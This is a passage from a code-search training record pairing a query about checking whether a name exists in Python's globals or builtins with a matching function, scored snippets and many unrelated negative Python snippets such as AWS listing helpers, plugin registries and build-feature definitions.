cluster\n if started_by:\n params[\"startedBy\"] = started_by\n return client.list_tasks(**params)", "def get_all_reservations(config):\n reservations = []\n region_list = regions(aws_access_key_id=config.keys.api,\n aws_secret_access_key=config.keys.secret)\n for region in region_list:\n _logger.info(\"Searching %s\", region)\n cnx = region.connect(aws_access_key_id=config.keys.api,\n aws_secret_access_key=config.keys.secret)\n for reservation in cnx.get_all_instances():\n _logger.info(\"Found %s %s\", reservation,\n [str(i.id) for i in reservation.instances])\n reservations.append(reservation)\n return reservations", "async def la() -> Tuple[str]:\n li = []\n async with _create_client() as client:\n for bucket in (await client.list_buckets())['Buckets']:\n _ = await client.list_objects(Bucket=bucket['Name'])\n for item in _['Contents']:\n if item['Key'].endswith('/') is False:\n li.append(bucket['Name'] + '/' + item['Key'])\n logger.info('List all objects in all buckets.')\n return tuple(li)", "def get_matching_s3_objects(client, bucket, prefix=\"\", suffix=\"\"):\n\n kwargs = {\"Bucket\": bucket}\n if isinstance(prefix, str):\n kwargs[\"Prefix\"] = prefix\n # logging.info(\"kwargs: %s\" % kwargs)\n while True:\n resp = client.list_objects_v2(**kwargs)\n try:\n contents = resp[\"Contents\"]\n except KeyError:\n return\n for obj in contents:\n key = obj[\"Key\"]\n if key.startswith(prefix) and key.endswith(suffix):\n yield obj\n try:\n kwargs[\"ContinuationToken\"] = resp[\"NextContinuationToken\"]\n except KeyError:\n break", "def assets_search(ctx, text, pretty):\n ocean = ctx.obj['ocean']\n response = ocean.search(text, pretty)\n echo(response)", "def get_buckets(args):\n\n args.suppress_verify_output = True\n if verify(args) != 0:\n # restore stdout\n sys.stdout = sys.__stdout__\n print(\"Config file not valid, please use the verify function to debug\")\n return []\n\n with open(args.file, \"r\") as f:\n config_json = json.load(f)\n\n buckets = []\n for group in config_json[\"groups\"]:\n for bucket in group[\"buckets\"]:\n buckets.append(group[\"name\"] + \"/\" + bucket[\"name\"])\n return buckets", "def list_orgs(self):\n orgs = list(self.orgs.keys())\n orgs.sort()\n return orgs", "def access(config, region, accounts=()):\n config = validate.callback(config)\n accounts_report = []\n\n def check_access(account):\n accounts_report.append(account)\n session = get_session(account['role'], region)\n identity = session.client('sts').get_caller_identity()\n account['account_id'] = identity['Account']\n account.pop('groups')\n account.pop('role')\n client = session.client('iam')\n policy_arn = identity['Arn']\n if policy_arn.count('/') > 1:\n policy_arn = policy_arn.rsplit('/', 1)[0]\n if ':sts:' in policy_arn:\n policy_arn = policy_arn.replace(':sts', ':iam')\n if ':assumed-role' in policy_arn:\n policy_arn = policy_arn.replace(':assumed-role', ':role')\n evaluation = client.simulate_principal_policy(\n PolicySourceArn=policy_arn,\n ActionNames=['logs:CreateExportTask'])['EvaluationResults']\n account['access'] = evaluation[0]['EvalDecision']\n\n with ThreadPoolExecutor(max_workers=16) as w:\n futures = {}\n for account in config.get('accounts', ()):\n if accounts and account['name'] not in accounts:\n continue\n futures[w.submit(check_access, account)] = None\n for f in as_completed(futures):\n pass\n accounts_report.sort(key=operator.itemgetter('access'), reverse=True)\n print(tabulate(accounts_report, headers='keys'))" ]
[ "0.5892514", "0.5680063", "0.5646794", "0.5550604", "0.5464335", "0.5430682", "0.5372216", "0.5369034", "0.53668135", "0.53542835", "0.5335564", "0.5326624", "0.53066283", "0.5276022", "0.5273535", "0.52497715", "0.5233608", "0.5233608", "0.5214551", "0.5214118", "0.52107763", "0.5200044", "0.51917666", "0.5191017", "0.51906574", "0.518239", "0.51757336", "0.5162156", "0.5157345", "0.50720674", "0.49868813", "0.49844575", "0.49792635", "0.49750638", "0.49555397", "0.4951665", "0.49330264", "0.4918615", "0.4911662", "0.49111983", "0.4885512", "0.48835906", "0.48819765", "0.48563516", "0.48405048", "0.4833911", "0.48321855", "0.4825422", "0.48225924", "0.48074907", "0.48065007", "0.4800443", "0.47986984", "0.47933704", "0.47875172", "0.47830665", "0.47826758", "0.47820073", "0.4777325", "0.47746515", "0.4769064", "0.47682372", "0.47681522", "0.47638002", "0.4760509", "0.475963", "0.47585303", "0.4755685", "0.4749292", "0.47372445", "0.47270283", "0.47257784", "0.47215122", "0.47197208", "0.47189757", "0.47145712", "0.4713038", "0.4713038", "0.47050312", "0.47041196", "0.47008273", "0.46999246", "0.4697282", "0.46935987", "0.46884435", "0.46871746", "0.4679508", "0.4666458", "0.46651807", "0.46529445", "0.46417633", "0.46369332", "0.46349275", "0.46346894", "0.46332097", "0.46324986", "0.46315184", "0.46257138", "0.46257126", "0.46232027" ]
0.63345224
0
Checks globals() and builtins for the existence of the object name (used for StuWareSoftSystems' bootstrap)
def checkObjectInNameSpace(objectName): if objectName is None or not isinstance(objectName, basestring) or objectName == u"": return False if objectName in globals(): return True return objectName in dir(builtins)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def isbuiltin(object):\n if inspect.isbuiltin(object):\n return True\n\n return getattr(object, '__module__', None) == 'builtins'", "def is_builtin_name(name):\r\n if name.startswith('__') and name.endswith('__'):\r\n return ALL_LOWER_CASE_RE.match(name[2:-2]) is not None\r\n return False", "def global_exists(self, global_name):\n return self.evaluate('!(typeof %s === \"undefined\");' %\n global_name)", "def testFindsBuiltins(self):\r\n self.assertEqual('sys', modulefinder.get_module_filename('sys'))\r\n self.assertEqual('time', modulefinder.get_module_filename('time'))", "def has_global(node, name):\n return hasattr(node, \"globals\") and name in node.globals", "def is_builtins(self) -> bool:\n return self.source.startswith(self.builtins_import_string)", "def isbuiltin(object):\r\n return isinstance(object, types.BuiltinFunctionType)", "def _is_in_stdlib(module, some_object):\n # Clear PYTHONPATH temporarily and try importing the given module.\n original_sys_path = sys.path\n lib_path = os.path.dirname(traceback.__file__)\n sys.path = [lib_path]\n\n # On Mac, some extra library paths are required.\n if 'darwin' in platform.system().lower():\n for path in original_sys_path:\n if 'site-packages' not in path:\n sys.path.append(path)\n\n in_stdlib = False\n\n try:\n module = importlib.import_module(module)\n\n if some_object:\n getattr(module, some_object)\n\n in_stdlib = True\n except (ImportError, AttributeError):\n pass\n\n sys.path = original_sys_path\n\n return in_stdlib", "def test_core_object_types_global():\n for core_object_type in CORE_OBJECT_TYPES:\n core_object = get_object_from_string(core_object_type)\n assert core_object.__name__.lower() == core_object_type", "def test_global():\n global PATH, OS, collections, deque\n from os import path as PATH\n import os as OS\n import collections\n from collections import deque\n # make sure that these triggers unused-variable\n from sys import platform\n from sys import version as VERSION\n import this\n import re as RE", "def global_check(self):\n return None", "def is_ipython():\n return 'get_ipython' in globals()", "def _validate_builtin(_):\n pass", "def in_global_code(self):\n return self.sscope is None and self.lscope is None", "def __contains__(name):", "def is_builtin(fn) -> bool:\n return getattr(fn, TRITON_BUILTIN, False)", "def register(self, name, obj):\r\n self.eval_allowed_globals[name] = obj", "def _is_exported_name(name):\n # If ``check`` ever switches to using the ``__all__`` mechanism, update this code:\n return not name.startswith(\"_\")", "def ignore_builtin_verification():\n return not current_space().skip_builtin_verification", "def ioc(globals):\n\tfrom Module.Shapes.ShapeFactory import shape_factory\n\tglobals['shape_factory'] = shape_factory\n\tfrom Module.Lighting.Colors import Colors\n\tglobals['Colors'] = Colors", "def is_top_level_function(obj: Any) -> bool:\r\n return callable(obj) and obj.__name__ in sys.modules[obj.__module__].__dict__", "def is_builtin_type(tp):\n return hasattr(__builtins__, tp.__name__) and tp is getattr(__builtins__, tp.__name__)", "def is_mobu():\n\n return 'pyfbsdk' in main.__dict__", "def get_builtin(name):\n t = getattr(builtins, name)\n if isinstance(t, type):\n return t\n raise ValueError(name)", "def check_for_underscore(self):\n # If something injected a '_' variable in __builtin__, delete\n # ipython's automatic one so we don't clobber that. 
gettext() in\n # particular uses _, so we need to stay away from it.\n if '_' in __builtin__.__dict__:\n try:\n del self.shell.user_ns['_']\n except KeyError:\n pass", "def test_if_ipython():\n try:\n return __IPYTHON__\n except NameError:\n return False", "def dispatch_commands(_globals, _name_):\n try:\n argh.dispatch_commands([\n v for k, v in _globals.items()\n if isinstance(v, types.FunctionType)\n and v.__module__ == _name_\n and not k.startswith('_')\n and k != 'main'\n ])\n except KeyboardInterrupt:\n sys.exit(1)", "def register(obj_name, obj):\n if obj_name not in ninja_globals['register']:\n ninja_globals['register'][obj_name] = obj", "def test_swift_globals(self):\n self.build()\n self.do_test()", "def test_molecool_imported():\n assert \"molecool\" in sys.modules", "def test_already_registered_001(self):\n self._make_basic_environment(\n textwrap.dedent(\n \"\"\"\\\n from rez_lint.plugins.checkers import base_checker\n\n class Something(base_checker.BaseChecker):\n def run(package, context):\n return []\n \"\"\"\n )\n )\n\n cli._register_external_plugins.has_run = ( # pylint: disable=protected-access\n False\n )\n cli._register_external_plugins() # pylint: disable=protected-access", "def _check_name(self):\n\t\tpass", "def test_override_builtin(self):\n PyLoader.register(override_builtins=True)\n self.assertIs(PRIORITY_HOOKS['.py'], PyLoader)", "def lookup(name, frame, locals):\n if name in locals:\n return 'local', locals[name]\n if name in frame.f_globals:\n return 'global', frame.f_globals[name]\n if '__builtins__' in frame.f_globals:\n builtins = frame.f_globals['__builtins__']\n if isinstance(builtins, type({})):\n if name in builtins:\n return 'builtin', builtins[name]\n else:\n if hasattr(builtins, name):\n return 'builtin', getattr(builtins, name)\n return None, __UNDEF__", "def auto_load():\n if sys.startswith('linux'):\n pass", "def load_python_global(module, name):\n\n # The builtin module has been renamed in python3\n if module == '__builtin__' and six.PY3:\n module = 'builtins'\n module = importlib.import_module(module)\n return getattr(module, name)", "def is_term():\n global _STATIC_VARS\n return _STATIC_VARS.term", "def _load_objects():\n global DataArray, DataFrame, Series, Index, ndarray\n ndarray = np.ndarray\n DataArray = getattr(sys.modules.get('xarray', None), 'DataArray', ndarray)\n DataFrame = getattr(sys.modules.get('pandas', None), 'DataFrame', ndarray)\n Series = getattr(sys.modules.get('pandas', None), 'Series', ndarray)\n Index = getattr(sys.modules.get('pandas', None), 'Index', ndarray)", "def get_object_name(obj):\n\n namespace = dict(globals(), **locals()) \n return [name for name in namespace if namespace[name] is obj][0]", "def test_register_automatic(self):\n all_plugins = registry.get_checkers() + registry.get_contexts()\n self.assertFalse(\"Something\" in {plugin.__name__ for plugin in all_plugins})\n\n self._make_basic_environment(\n textwrap.dedent(\n \"\"\"\\\n from rez_lint.plugins.checkers import base_checker\n\n class Something(base_checker.BaseChecker):\n def run(package, context):\n return []\n \"\"\"\n )\n )\n\n all_plugins = registry.get_checkers() + registry.get_contexts()\n self.assertTrue(\"Something\" in {plugin.__name__ for plugin in all_plugins})", "def init():\n global PLUGIN_NAME\n PLUGIN_NAME = inspect.currentframe().f_code.co_filename", "def __missing__(self, key):\n if key in dir(__builtins__):\n return getattr(__builtins__, key)\n try:\n return RecursiveImportingModule(\n import_module(self.aliases.get(key, key)))\n 
except ImportError:\n exc = NameError(\"name '{}' is not defined\".format(key))\n exc.__cause__ = None\n raise exc", "def hasattr(x, name) -> bool:\n pass", "def is_defect_name(global_name):\n return '.defects:' in global_name", "def test_globals(self):\n self.assertNotEqual(Languages.LANGUAGES_FILE, None)\n self.assertEqual(Languages._languagesDict, None)", "def error_handlings():\n\n global_names = globals()\n for name in global_names:\n if name.startswith(\"provoke_and_handle_\"):\n print(\"\\nAUFRUF von '{}':\".format(name))\n global_names[name]()", "def _is_rr_present() -> bool:\n\n # this is ugly but I couldn't find a better way to do it\n # feel free to refactor it\n globals_list_literal_str = gdb.execute(\"python print(list(globals().keys()))\", to_string=True)\n interpreter_globals = ast.literal_eval(globals_list_literal_str)\n\n return \"RRCmd\" in interpreter_globals and \"RRWhere\" in interpreter_globals", "def check_cachable(self, codelib):\n return not codelib.has_dynamic_globals", "def hasattr_silent(object, name):\n\n try:\n if not object:\n return False\n return hasattr(object, name)\n except AttributeError:\n return False", "def pyname(ifmain=False):\n\n if ifmain is True:\n return __name__ == \"__main__\"\n return __name__", "def register_globals ():\n\n # This feature is used to determine which OS we're on.\n # In future, this may become <target-os> and <host-os>\n # TODO: check this. Compatibility with bjam names? Subfeature for version?\n os = sys.platform\n feature.feature ('os', [os], ['propagated', 'link-incompatible'])\n\n\n # The two OS features define a known set of abstract OS names. The host-os is\n # the OS under which bjam is running. Even though this should really be a fixed\n # property we need to list all the values to prevent unknown value errors. Both\n # set the default value to the current OS to account for the default use case of\n # building on the target OS.\n feature.feature('host-os', __os_names)\n feature.set_default('host-os', default_host_os())\n\n feature.feature('target-os', __os_names, ['propagated', 'link-incompatible'])\n feature.set_default('target-os', default_host_os())\n\n feature.feature ('toolset', [], ['implicit', 'propagated' ,'symmetric'])\n\n feature.feature ('stdlib', ['native'], ['propagated', 'composite'])\n\n feature.feature ('link', ['shared', 'static'], ['propagated'])\n feature.feature ('runtime-link', ['shared', 'static'], ['propagated'])\n feature.feature ('runtime-debugging', ['on', 'off'], ['propagated'])\n\n\n feature.feature ('optimization', ['off', 'speed', 'space'], ['propagated'])\n feature.feature ('profiling', ['off', 'on'], ['propagated'])\n feature.feature ('inlining', ['off', 'on', 'full'], ['propagated'])\n\n feature.feature ('threading', ['single', 'multi'], ['propagated'])\n feature.feature ('rtti', ['on', 'off'], ['propagated'])\n feature.feature ('exception-handling', ['on', 'off'], ['propagated'])\n\n # Whether there is support for asynchronous EH (e.g. 
catching SEGVs).\n feature.feature ('asynch-exceptions', ['off', 'on'], ['propagated'])\n\n # Whether all extern \"C\" functions are considered nothrow by default.\n feature.feature ('extern-c-nothrow', ['off', 'on'], ['propagated'])\n\n feature.feature ('debug-symbols', ['on', 'off'], ['propagated'])\n feature.feature ('define', [], ['free'])\n feature.feature ('undef', [], ['free'])\n feature.feature ('include', [], ['free', 'path']) #order-sensitive\n feature.feature ('cflags', [], ['free'])\n feature.feature ('cxxflags', [], ['free'])\n feature.feature ('asmflags', [], ['free'])\n feature.feature ('linkflags', [], ['free'])\n feature.feature ('archiveflags', [], ['free'])\n feature.feature ('version', [], ['free'])\n\n feature.feature ('location-prefix', [], ['free'])\n\n feature.feature ('action', [], ['free'])\n\n\n # The following features are incidental, since\n # in themself they have no effect on build products.\n # Not making them incidental will result in problems in corner\n # cases, for example:\n #\n # unit-test a : a.cpp : <use>b ;\n # lib b : a.cpp b ;\n #\n # Here, if <use> is not incidental, we'll decide we have two\n # targets for a.obj with different properties, and will complain.\n #\n # Note that making feature incidental does not mean it's ignored. It may\n # be ignored when creating the virtual target, but the rest of build process\n # will use them.\n feature.feature ('use', [], ['free', 'dependency', 'incidental'])\n feature.feature ('dependency', [], ['free', 'dependency', 'incidental'])\n feature.feature ('implicit-dependency', [], ['free', 'dependency', 'incidental'])\n\n feature.feature('warnings', [\n 'on', # Enable default/\"reasonable\" warning level for the tool.\n 'all', # Enable all possible warnings issued by the tool.\n 'off'], # Disable all warnings issued by the tool.\n ['incidental', 'propagated'])\n\n feature.feature('warnings-as-errors', [\n 'off', # Do not fail the compilation if there are warnings.\n 'on'], # Fail the compilation if there are warnings.\n ['incidental', 'propagated'])\n\n feature.feature('c++-template-depth',\n [str(i) for i in range(64,1024+1,64)] +\n [str(i) for i in range(20,1000+1,10)] +\n # Maximum template instantiation depth guaranteed for ANSI/ISO C++\n # conforming programs.\n ['17'],\n ['incidental', 'optional', 'propagated'])\n\n feature.feature ('source', [], ['free', 'dependency', 'incidental'])\n feature.feature ('library', [], ['free', 'dependency', 'incidental'])\n feature.feature ('file', [], ['free', 'dependency', 'incidental'])\n feature.feature ('find-shared-library', [], ['free']) #order-sensitive ;\n feature.feature ('find-static-library', [], ['free']) #order-sensitive ;\n feature.feature ('library-path', [], ['free', 'path']) #order-sensitive ;\n # Internal feature.\n feature.feature ('library-file', [], ['free', 'dependency'])\n\n feature.feature ('name', [], ['free'])\n feature.feature ('tag', [], ['free'])\n feature.feature ('search', [], ['free', 'path']) #order-sensitive ;\n feature.feature ('location', [], ['free', 'path'])\n\n feature.feature ('dll-path', [], ['free', 'path'])\n feature.feature ('hardcode-dll-paths', ['true', 'false'], ['incidental'])\n\n\n # This is internal feature which holds the paths of all dependency\n # dynamic libraries. 
On Windows, it's needed so that we can all\n # those paths to PATH, when running applications.\n # On Linux, it's needed to add proper -rpath-link command line options.\n feature.feature ('xdll-path', [], ['free', 'path'])\n\n #provides means to specify def-file for windows dlls.\n feature.feature ('def-file', [], ['free', 'dependency'])\n\n # This feature is used to allow specific generators to run.\n # For example, QT tools can only be invoked when QT library\n # is used. In that case, <allow>qt will be in usage requirement\n # of the library.\n feature.feature ('allow', [], ['free'])\n\n # The addressing model to generate code for. Currently a limited set only\n # specifying the bit size of pointers.\n feature.feature('address-model', ['16', '32', '64'], ['propagated', 'optional'])\n\n # Type of CPU architecture to compile for.\n feature.feature('architecture', [\n # x86 and x86-64\n 'x86',\n\n # ia64\n 'ia64',\n\n # Sparc\n 'sparc',\n\n # RS/6000 & PowerPC\n 'power',\n\n # MIPS/SGI\n 'mips1', 'mips2', 'mips3', 'mips4', 'mips32', 'mips32r2', 'mips64',\n\n # HP/PA-RISC\n 'parisc',\n\n # Advanced RISC Machines\n 'arm',\n\n # Combined architectures for platforms/toolsets that support building for\n # multiple architectures at once. \"combined\" would be the default multi-arch\n # for the toolset.\n 'combined',\n 'combined-x86-power'],\n\n ['propagated', 'optional'])\n\n # The specific instruction set in an architecture to compile.\n feature.feature('instruction-set', [\n # x86 and x86-64\n 'native', 'i486', 'i586', 'i686', 'pentium', 'pentium-mmx', 'pentiumpro', 'pentium2', 'pentium3',\n 'pentium3m', 'pentium-m', 'pentium4', 'pentium4m', 'prescott', 'nocona', 'core2', 'corei7', 'corei7-avx', 'core-avx-i',\n 'conroe', 'conroe-xe', 'conroe-l', 'allendale', 'merom', 'merom-xe', 'kentsfield', 'kentsfield-xe', 'penryn', 'wolfdale',\n 'yorksfield', 'nehalem', 'sandy-bridge', 'ivy-bridge', 'haswell', 'k6', 'k6-2', 'k6-3', 'athlon', 'athlon-tbird', 'athlon-4', 'athlon-xp',\n 'athlon-mp', 'k8', 'opteron', 'athlon64', 'athlon-fx', 'k8-sse3', 'opteron-sse3', 'athlon64-sse3', 'amdfam10', 'barcelona',\n 'bdver1', 'bdver2', 'bdver3', 'btver1', 'btver2', 'winchip-c6', 'winchip2', 'c3', 'c3-2', 'atom',\n\n # ia64\n 'itanium', 'itanium1', 'merced', 'itanium2', 'mckinley',\n\n # Sparc\n 'v7', 'cypress', 'v8', 'supersparc', 'sparclite', 'hypersparc', 'sparclite86x', 'f930', 'f934',\n 'sparclet', 'tsc701', 'v9', 'ultrasparc', 'ultrasparc3',\n\n # RS/6000 & PowerPC\n '401', '403', '405', '405fp', '440', '440fp', '505', '601', '602',\n '603', '603e', '604', '604e', '620', '630', '740', '7400',\n '7450', '750', '801', '821', '823', '860', '970', '8540',\n 'power-common', 'ec603e', 'g3', 'g4', 'g5', 'power', 'power2',\n 'power3', 'power4', 'power5', 'powerpc', 'powerpc64', 'rios',\n 'rios1', 'rsc', 'rios2', 'rs64a',\n\n # MIPS\n '4kc', '4kp', '5kc', '20kc', 'm4k', 'r2000', 'r3000', 'r3900', 'r4000',\n 'r4100', 'r4300', 'r4400', 'r4600', 'r4650',\n 'r6000', 'r8000', 'rm7000', 'rm9000', 'orion', 'sb1', 'vr4100',\n 'vr4111', 'vr4120', 'vr4130', 'vr4300',\n 'vr5000', 'vr5400', 'vr5500',\n\n # HP/PA-RISC\n '700', '7100', '7100lc', '7200', '7300', '8000',\n\n # Advanced RISC Machines\n 'armv2', 'armv2a', 'armv3', 'armv3m', 'armv4', 'armv4t', 'armv5',\n 'armv5t', 'armv5te', 'armv6', 'armv6j', 'iwmmxt', 'ep9312'],\n\n ['propagated', 'optional'])\n\n feature.feature('conditional', [], ['incidental', 'free'])\n\n # The value of 'no' prevents building of a target.\n feature.feature('build', ['yes', 'no'], ['optional'])\n\n 
# Windows-specific features\n feature.feature ('user-interface', ['console', 'gui', 'wince', 'native', 'auto'], [])\n feature.feature ('variant', [], ['implicit', 'composite', 'propagated', 'symmetric'])\n\n\n variant ('debug', ['<optimization>off', '<debug-symbols>on', '<inlining>off', '<runtime-debugging>on'])\n variant ('release', ['<optimization>speed', '<debug-symbols>off', '<inlining>full',\n '<runtime-debugging>off', '<define>NDEBUG'])\n variant ('profile', ['release'], ['<profiling>on', '<debug-symbols>on'])", "def test_get_module_qualname_from_path_sys(self):\n\n name = b_utils.get_module_qualname_from_path(os.__file__)\n self.assertEqual(\"os\", name)\n\n # This will fail because of magic for os.path. Not sure how to fix.\n # name = b_utils.get_module_qualname_from_path(os.path.__file__)\n # self.assertEqual(name, 'os.path')", "def isclassinstance(object):\n if not hasattr(object, \"__class__\"):\n return False\n if isbuiltin(object.__class__):\n return False\n return True", "def _check_add_locals(frame, frame_num, total_frames):\n # Include the last frames locals\n # Include any frame locals that came from a file in the project's root\n return any(((frame_num == total_frames - 1),\n ('root' in SETTINGS and (frame.get('filename') or '').lower().startswith((SETTINGS['root'] or '').lower()))))", "def globals_load(plugin_context, globals_, symbols):\n for g in [plugin_context.rosh_globals, globals_]:\n if g is not None:\n g.update(symbols)", "def _is_type_in_scope(self, name):", "def full_object_name(obj):\n\n try:\n module = obj.__module__\n if module is None or module == str.__class__.__module__:\n return obj.__name__ # Avoid reporting __builtin__\n else:\n return module + '.' + obj.__name__\n except Exception:\n return None", "def test_no_shadowed_builtins(command_name, command_table, builtins):\n errors = []\n for sub_name, sub_command in command_table.items():\n op_help = sub_command.create_help_command()\n arg_table = op_help.arg_table\n for arg_name in arg_table:\n if any(p.startswith(arg_name) for p in builtins):\n # Then we are shadowing or prefixing a top level argument\n errors.append(\n 'Shadowing/Prefixing a top level option: '\n '%s.%s.%s' % (command_name, sub_name, arg_name))\n if errors:\n raise AssertionError('\\n' + '\\n'.join(errors))", "def is_imported():\n return len(inspect.stack()) > 3", "def __contains__(self, name):\n return name in self._modules", "def _addGlobals(self, globalsDict):\n globalsDict['obj'] = None\n globalsDict['role'] = None\n globalsDict['pyatspi'] = pyatspi", "def has_global_storage(self, name: str) -> bool:\n return name in self.global_storage", "def builtin(self):\n return BuiltIn()", "def test_xchemOT_imported():\n assert \"xchemOT\" in sys.modules", "def is_object_identification_module(self):\n return True", "def test_plugins(self):\n from omtk import plugin_manager\n pm = plugin_manager.plugin_manager\n\n loaded_plugin_names = [plugin.cls.__name__ for plugin in pm.get_loaded_plugins_by_type('modules')]\n\n builtin_plugin_names = (\n 'Arm',\n 'FK',\n 'AdditiveFK',\n 'AvarGrpOnSurface',\n 'FaceBrow',\n 'FaceEyeLids',\n 'FaceEyes',\n 'FaceJaw',\n 'FaceLips',\n 'FaceNose',\n 'FaceSquint',\n 'Hand',\n 'Head',\n 'IK',\n 'InteractiveFK',\n 'Leg',\n 'LegQuad',\n 'Limb',\n 'Neck',\n 'Ribbon',\n 'SplineIK',\n 'Twistbone',\n )\n\n for plugin_name in builtin_plugin_names:\n self.assertIn(plugin_name, loaded_plugin_names)", "def is_import(self):\n return self.sh_info is None and (self.binding == 'STB_GLOBAL' or \\\n self.binding == 'STB_WEAK' or 
\\\n self.binding == 'STT_FUNC')", "def test_non_namespaced_object_name(\n self, get_context_mock, get_library_instance_mock\n ):\n with mock.patch.object(CumulusCI, \"get_namespace_prefix\", return_value=\"\"):\n po = PageObjects(FOO_PATH)\n\n FooTestPage = importer.import_class_or_module_by_path(FOO_PATH)\n MockGetLibraryInstance.libs[\"FooTestPage\"] = _PageObjectLibrary(\n FooTestPage()\n )\n\n pobj = po.get_page_object(\"Test\", \"Foo__c\")\n self.assertEqual(pobj.object_name, \"Foo__c\")", "def inspect_builtin(obj):\n\n print_with_indent(\"+Builtin Function: %s\" % obj.__name__)\n indent()\n print_docstr(obj)\n dedent()\n print()", "def test_check_module(self) -> None:\n check_module(\"os\")", "def exists(_env):\n detector = DetectCompiler()\n if detector['icx'] is None:\n return False\n return True", "def _is_run_type(cls, object_):\n # Do a string comparison instead of using isinstance() to avoid needing\n # to import lyse or other modules with these classes.\n return (type(object_).__name__ in cls._RUN_TYPES)", "def _ofind(self,oname):\n\n # the @ in magics isn't really part of the name\n oname = oname.strip()\n if oname.startswith('@'):\n oname = oname[1:]\n\n # Namespaces to search in:\n user_ns = self.shell.user_ns\n user_config_ns = self.shell.user_config_ns\n internal_ns = self.shell.internal_ns\n builtin_ns = __builtin__.__dict__\n\n # Put them in a list. The order is important so that we find things in the\n # same order that Python finds them.\n namespaces = [ ('Interactive',user_ns),\n ('User-defined configuration',user_config_ns),\n ('IPython internal',internal_ns),\n ('Python builtin',builtin_ns)\n ]\n\n # initialize results to 'null'\n found = 0; obj = None; ospace = None; ds = None; ismagic = 0\n\n try:\n for nsname,ns in namespaces:\n try:\n obj = ns[oname]\n except KeyError:\n pass\n else:\n found = 1\n ospace = nsname\n ds = inspect.getdoc(obj)\n raise 'found it'\n except 'found it':\n pass\n\n # try to see if it's magic\n if not found:\n try:\n obj = eval('self.magic_'+oname)\n found = 1\n ospace = 'IPython internal'\n ismagic = 1\n ds = inspect.getdoc(obj)\n except:\n pass\n # Play some games to try and find info about dotted objects\n # and for things like {}.get? or ''.remove? to work\n if not found:\n try:\n self.tmp_obj = eval(oname,user_ns)\n found = 1\n except:\n try:\n self.tmp_obj = eval(oname,builtin_ns)\n found = 1\n except:\n pass\n if found:\n ds = inspect.getdoc(self.tmp_obj)\n ospace = 'Currently not defined in user session.'\n obj = self.tmp_obj\n del self.tmp_obj\n return found,obj,ospace,ds,ismagic", "def help() : \n\n import types\n\n globs = globals()\n for key, val in globs.iteritems() :\n if isinstance(val, types.FunctionType ) :\n print key\n #for obj in globals() :\n # print obj\n # print obj.callable()\n print globals()['main'].__doc__", "def test_stepregistry_module_should_have_global_registry_instance():\n # given & when\n from radish.stepregistry import registry\n\n # then\n assert isinstance(registry, StepRegistry)", "def test_hookregistry_module_should_have_global_registry_instance():\n # given & when\n from radish.hookregistry import registry\n\n # then\n assert isinstance(registry, HookRegistry)", "def provoke_and_handle_NameError():\n try:\n print(bliblablub)\n except NameError as ne:\n print(f\"Sorry! 
{ne}\")", "def reentrant_load(loaded_symbols, globals_):\n if loaded_symbols is not None:\n if globals_ is not None:\n globals_.update(loaded_symbols)\n return True\n else:\n return False", "def get_functions():\n\treturn [f for f in globals() if f.startswith('make_')]", "def _isobject(self, name, exist):\r\n if exist in [2, 5]:\r\n return False\r\n cmd = \"isobject(%s)\" % name\r\n if not self._engine:\r\n msg = \"Session is not open\"\r\n raise Oct2PyError(msg)\r\n resp = self._engine.eval(cmd, silent=True).strip()\r\n return resp == \"ans = 1\"", "def test_mmelemental_imported():\n import sys\n\n assert \"mmelemental\" in sys.modules", "def main():\n check_slugs()\n check_identifiers()", "def _is_str_matching_builtin_type(str_value: str) -> bool:\n builtin_types = [\n getattr(builtins, d)\n for d in dir(builtins)\n if isinstance(getattr(builtins, d), type)\n ]\n return f\"<class '{str_value}'>\" in [str(bt) for bt in builtin_types]", "def _LoadGlobalSymbolsFromDump(dump_obj):\n symbols = set()\n for key in (\"elf_functions\", \"elf_objects\"):\n symbols.update(\n symbol.get(\"name\", \"\") for symbol in dump_obj.get(key, []) if\n symbol.get(\"binding\", \"global\") == \"global\")\n return symbols", "def test_ufedmm_imported():\n assert \"ufedmm\" in sys.modules", "def _running_under_regular_virtualenv():\n # pypa/virtualenv case\n return hasattr(sys, \"real_prefix\")", "def _is_plugin_name(name):\n return name in _path_cache and name in _module_cache", "def builtin(self) :\n try :\n return self._builtin\n except Exception as e:\n raise e", "def test_override_builtin_extension_without_explicit_flag(self):\n with self.assertRaises(ValueError):\n PyLoader.register()", "def test_already_registered_002(self):\n\n class MyChecker(object):\n \"\"\"Do nothing.\"\"\"\n\n @staticmethod\n def get_long_code():\n \"\"\"Do nothing.\"\"\"\n return \"something\"\n\n @staticmethod\n def get_order():\n \"\"\"Do nothing.\"\"\"\n return 0\n\n @staticmethod\n def run(_, __):\n \"\"\"Do nothing.\"\"\"\n return []\n\n class MyContext(object):\n \"\"\"Do nothing.\"\"\"\n\n @staticmethod\n def get_order():\n \"\"\"Do nothing.\"\"\"\n return 0\n\n @staticmethod\n def run(_, __):\n \"\"\"Do nothing.\"\"\"\n return\n\n registry.register_checker(MyChecker)\n\n with self.assertRaises(EnvironmentError):\n registry.register_checker(MyChecker)\n\n registry.register_context(MyContext)\n\n with self.assertRaises(EnvironmentError):\n registry.register_context(MyContext)", "def find_class(self, module, name):\n raise pickle.UnpicklingError(\"global '%s.%s' is forbidden\" %\n (module, name))", "def __exist_module_in_sys_cache(module_name):\n try:\n if hasattr(sys, 'stypy_module_cache'):\n return module_name in sys.stypy_module_cache\n else:\n __preload_sys_module_cache()\n return False\n except:\n return False", "def is_unreal():\n\n try:\n import unreal\n except ImportError:\n return False\n\n return True", "def is_nuke():\n try:\n import _nuke\n return True\n except ImportError:\n return False", "def builtin(self) :\n\t\ttry :\n\t\t\treturn self._builtin\n\t\texcept Exception as e:\n\t\t\traise e", "def is_houdini():\n\n return 'hou' in main.__dict__", "def _find_labelled_objects_functions():\n\n def _num_args_without_default_value(fn_sig):\n return len(\n [\n param\n for param in fn_sig.parameters.values()\n if param.default is inspect._empty\n ]\n )\n\n def _takes_object_labels_kwarg(fn):\n fn_sig = inspect.signature(fn)\n return (\n \"object_labels\" in fn_sig.parameters\n and _num_args_without_default_value(fn_sig) == 
1\n )\n\n fns = [\n (fn_name, fn)\n for (fn_name, fn) in inspect.getmembers(\n sys.modules[__name__], inspect.isfunction\n )\n if not fn_name.startswith(\"_\") and _takes_object_labels_kwarg(fn)\n ]\n\n return dict(fns)", "def test_setup_object_without__all__name__(self):\n with self.assertRaises(AttributeError):\n pluggable_package.setup(self._test_object)", "def has_appname(appname):\n return appname in Registry.monomers", "def test_constructors(self, name, obj):\n assert getattr(forge, name) == obj" ]
